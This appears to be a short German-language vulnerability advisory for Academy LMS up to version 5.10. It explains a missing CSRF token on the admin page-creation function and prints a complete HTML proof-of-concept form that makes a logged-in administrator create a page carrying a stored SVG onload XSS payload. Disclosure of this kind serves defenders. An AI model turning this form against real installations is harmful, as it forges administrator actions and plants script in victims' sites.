
Academy LMS <= 5.10 CSRF / XSS
Academy LMS <= 5.10 CSRF / XSS
Academy LMS ist eine Anwendung, in der Personen Kurse erstellen und bewerben können. Die Funktion zum Hinzufügen einer neuen Seite ist anfällig für CSRF, da es kein Token gibt, das diesen Angriff verhindert. Zusätzlich kann diese Seite genutzt werden, um ein gespeichertes XSS-Payload zu laden.
Der erste Schritt unseres Proof of Concept ist die Authentifizierung auf der Plattform mit einem administrativen Benutzer.
Danach rufen Sie einfach die Seite auf, die den Code zur Ausnutzung der Schwachstelle enthält. Beachten Sie, dass ein neuer Button auf der Startseite der Website hinzugefügt wird, der zu einer XSS-Seite weiterleitet.
Verwendeter Code im Exploit:
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://target.com/admin/custom_page/add" method="POST">
<input type="hidden" name="page_title" value="CSRF XSS" />
<input type="hidden" name="page_content" value=""><svg onload=alert(document.domain);> ;" />
<input type="hidden" name="files" value="" />
<input type="hidden" name="button_title" value="CSRF XSS" />
<input type="hidden" name="button_position" value="header" />
<input type="hidden" name="page_url" value="xss" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>